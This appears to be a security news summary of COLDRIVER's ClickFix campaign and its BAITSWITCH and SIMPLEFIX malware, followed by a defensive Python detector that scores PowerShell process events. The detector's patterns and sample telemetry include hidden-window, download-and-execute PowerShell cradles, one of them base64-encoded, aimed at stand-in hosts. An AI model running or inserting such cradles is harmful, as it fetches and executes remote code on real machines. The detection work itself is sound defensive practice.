
"The Russian cyber espionage group COLDRIVER is adding the ClickFix attack method to its arsenal. The Zscaler ThreatLabz team discovered two new malware families, BAITSWITCH and SIMPLEFIX, which the group uses to selectively spread malware. This development shows that advanced threat actors continue to adapt to new techniques to reach their targets. COLDRIVER, also known as Star Blizzard, Callisto, and UNC4057, is known for targeting NGOs, think tanks, journalists, and human rights activists."
"The attack chain uses two new lightweight malware families. BAITSWITCH acts as a downloader, while SIMPLEFIX works as a PowerShell backdoor. The group uses server-side controls to determine who receives the malicious code based on user agent and machine characteristics. Based on the research, Zscaler can confidently determine that this campaign was executed by COLDRIVER, a Russian state-sponsored threat group."
COLDRIVER deployed ClickFix alongside two lightweight malware families: BAITSWITCH, a downloader, and SIMPLEFIX, a PowerShell backdoor. The actor uses server-side controls to deliver malicious code selectively, based on user agent and machine characteristics, which sharpens targeting and lowers the chance of detection. Targets are individuals well connected within NGOs, think tanks, journalism, and human rights communities, whose compromised accounts can enable deeper intrusion through follow-on phishing. The operation aligns with Russian state-sponsored strategic targeting patterns. Recommended defenses include independent verification of contacts, phishing-resistant MFA (FIDO2/WebAuthn), enforcing least privilege, and application control tools such as Windows AppLocker.
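As an added defender-side example, and not code from the Zscaler or Techzine write-ups, the script below shows the kind of detection logic that complements the recommended controls: it scores process-creation events for the execution pattern a ClickFix lure typically produces. The assumption is that the lure ends with the victim pasting a command into the Windows Run dialog, so PowerShell is spawned with explorer.exe as its parent, often with a hidden window, an encoded command, or a download cradle. The event field names, the weights, the threshold, and the sample events (including the example.invalid URLs) are all constructed for this illustration.

```python
"""
Score process-creation events for ClickFix-style PowerShell execution.
Added example; event format, weights and samples are constructed.
"""
import base64
import json
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent: str    # parent image file name, lower-cased
    image: str     # image file name, lower-cased
    cmdline: str   # full command line as logged


# Parents that indicate an interactive launch (Run dialog / File Explorer)
# rather than a scheduled task, service or admin console.
INTERACTIVE_PARENTS = {"explorer.exe"}
PARENT_WEIGHT = 2
THRESHOLD = 4   # constructed: tuned so a bare interactive shell does not alert

ENCODED_RE = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)

# (name, pattern, weight) -- signals commonly seen in pasted ClickFix commands
SIGNALS = [
    ("hidden_window", re.compile(r"-(w|windowstyle)\s+hidden", re.I), 1),
    ("encoded_command", ENCODED_RE, 2),
    ("no_profile", re.compile(r"-(nop|noprofile)\b", re.I), 1),
    ("invoke_expression", re.compile(r"\b(iex|invoke-expression)\b", re.I), 2),
    ("download_cradle",
     re.compile(r"\b(downloadstring|invoke-webrequest|iwr|curl)\b.*https?://", re.I), 2),
]


def parse_event(line: str) -> ProcessEvent:
    """Parse one JSON event line with ParentImage / Image / CommandLine keys."""
    d = json.loads(line)
    return ProcessEvent(
        parent=d["ParentImage"].rsplit("\\", 1)[-1].lower(),
        image=d["Image"].rsplit("\\", 1)[-1].lower(),
        cmdline=d["CommandLine"],
    )


def expand_encoded(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload (UTF-16LE) so it is scanned too."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(2)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return cmdline + " " + decoded


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return (score, matched signal names); non-PowerShell images score 0."""
    if ev.image not in {"powershell.exe", "pwsh.exe"}:
        return 0, []
    text = expand_encoded(ev.cmdline)
    hits = [name for name, pat, _ in SIGNALS if pat.search(text)]
    score = sum(w for name, _, w in SIGNALS if name in hits)
    if ev.parent in INTERACTIVE_PARENTS:
        hits.append("parent=" + ev.parent)
        score += PARENT_WEIGHT
    return score, hits


def detect(lines, threshold: int = THRESHOLD):
    """Yield (event, score, hits) for every event at or above the threshold."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        score, hits = score_event(ev)
        if score >= threshold:
            alerts.append((ev, score, hits))
    return alerts


# Constructed sample telemetry (not real logs). Event 5 carries an encoded
# command built here so the decode path is exercised.
_PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
_ENC = base64.b64encode(
    "iex (New-Object Net.WebClient).DownloadString('https://example.invalid/b')"
    .encode("utf-16-le")).decode()
SAMPLE_LINES = [json.dumps(e) for e in [
    {"ParentImage": "C:\\Windows\\explorer.exe", "Image": _PS,
     "CommandLine": "powershell -w hidden -nop -c \"iex (New-Object Net.WebClient)"
                    ".DownloadString('https://example.invalid/a')\""},
    {"ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": _PS,
     "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"ParentImage": "C:\\Windows\\explorer.exe", "Image": _PS,
     "CommandLine": "powershell.exe"},
    {"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
    {"ParentImage": "C:\\Windows\\explorer.exe", "Image": _PS,
     "CommandLine": "powershell.exe -nop -w hidden -enc " + _ENC},
]]

if __name__ == "__main__":
    for ev, score, hits in detect(SAMPLE_LINES):
        print(f"ALERT score={score} parent={ev.parent} hits={hits}")
        print(f"  {ev.cmdline[:80]}")
```

Only the two events that combine an explorer.exe parent with cradle-style flags cross the threshold; the scheduled backup script and the user who simply opened a shell do not, which is the trade-off a detection like this has to make against Run-dialog noise. The same scoring would sit naturally on top of AppLocker or least-privilege enforcement, where a blocked launch and an alert together give the responder both the prevention and the context.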
Read at Techzine Global